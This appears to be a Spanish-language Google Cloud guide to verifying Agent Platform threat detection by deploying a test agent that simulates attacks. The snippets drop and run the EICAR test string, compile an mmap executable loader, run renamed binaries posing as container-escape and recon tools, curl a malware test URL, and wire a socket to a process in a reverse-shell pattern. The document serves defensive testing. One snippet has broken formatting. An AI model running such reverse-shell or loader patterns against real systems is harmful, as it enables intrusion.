Cómo probar la Detección de amenazas de Agent Platform

En esta página, se explica cómo verificar que la detección de amenazas a Agent Platform funcione. Para ello, activa de forma intencional los detectores y verifica los resultados. La detección de amenazas a Agent Platform es un servicio integrado de Security Command Center.

Antes de comenzar

Para detectar posibles amenazas a tus agentes de Agent Runtime, asegúrate de que el servicio de detección de amenazas de Agent Platform esté habilitado en Security Command Center.

Configura el entorno

Para probar la Detección de amenazas de Agent Platform, configura un agente de demostración que simule actividad maliciosa.

Crea un proyecto y activa la shell

Selecciona o crea un proyecto de Google Cloud para usarlo en las pruebas.

Para probar los detectores, puedes usar la consola de Google Cloud y Cloud Shell.

  1. Ve a la consola deGoogle Cloud .

    Ir a la consola de Google Cloud

  2. Selecciona el proyecto que usarás para realizar las pruebas.

  3. Haz clic en Activate Cloud Shell (Activar Cloud Shell).

También puedes ejecutar las instrucciones de prueba desde una shell local.

Configura Agent Runtime

Si nunca usaste Agent Runtime en este proyecto, configura el entorno de Agent Runtime antes de comenzar. Registra el nombre del bucket de Cloud Storage de etapa de pruebas que creaste. También te recomendamos que sigas la guía de inicio rápido de Agent Runtime para aprender a desarrollar e implementar un agente con el SDK de Vertex AI.

Crea un script de prueba

Crearás varios archivos que se usarán para implementar un agente nuevo para las pruebas. Para ello, usa un editor de texto, como nano.

  1. Crea un nuevo archivo llamado requirements.txt con el siguiente contenido.

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. Crea un archivo vacío nuevo llamado installation_scripts/install.sh. Algunas pruebas requieren que se agregue contenido a este archivo.

  3. Crea un nuevo archivo llamado main.py con el siguiente contenido. Reemplaza las variables PROJECT_ID, LOCATION y STAGING_BUCKET. El nombre del bucket de etapa de pruebas debe incluir el prefijo gs://.

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

Configura el entorno virtual

  1. Crea y activa un entorno virtual de Python.

      python3 -m venv env
      source env/bin/activate
    
  2. Instala las dependencias necesarias en el entorno virtual.

    pip install -r requirements.txt
    

Prueba la secuencia de comandos

Ejecuta la secuencia de comandos desde el entorno virtual con python3 main.py. Este comando tardará varios minutos en compilar, implementar y ejecutar el agente de prueba.

La secuencia de comandos genera el nombre del recurso del agente implementado y algunos objetos JSON, incluida una respuesta del LLM y otros metadatos. Si encuentras errores de permisos o de implementación en esta etapa, consulta la sección de solución de problemas para conocer los próximos pasos.

Detectores de prueba

Para probar los detectores de detección de amenazas de Agent Platform, reemplaza el código en la función threat_detection_test por código que simule un ataque. La secuencia de comandos puede tardar mucho en implementar el agente y consultarlo. Para acelerar las pruebas, puedes combinar el contenido de varias de estas funciones.

Ejecución: Se ejecutó un objeto binario malicioso agregado

Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

Ejecución: Se cargó una biblioteca maliciosa agregada

Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba. Es posible que recibas un error del SDK de Vertex AI sobre el análisis de la respuesta, pero el hallazgo se generará de todos modos.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

Ejecución: Escape del contenedor

Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

Ejecución: Se detectó la ejecución de la herramienta de ataque de Kubernetes

Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

Ejecución: Se detectó la ejecución de la herramienta de reconocimiento local

Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

Ejecución: Se ejecutó un objeto binario malicioso modificado

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

Ejecución: Se cargó una biblioteca maliciosa modificada

Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

Se detectó una URL maliciosa

Actualiza el archivo installation_scripts/install.sh con el siguiente contenido.

#!/bin/bash
apt-get install -y curl --no-install-recommends

Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

Shells inversas

Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

¿Qué sigue?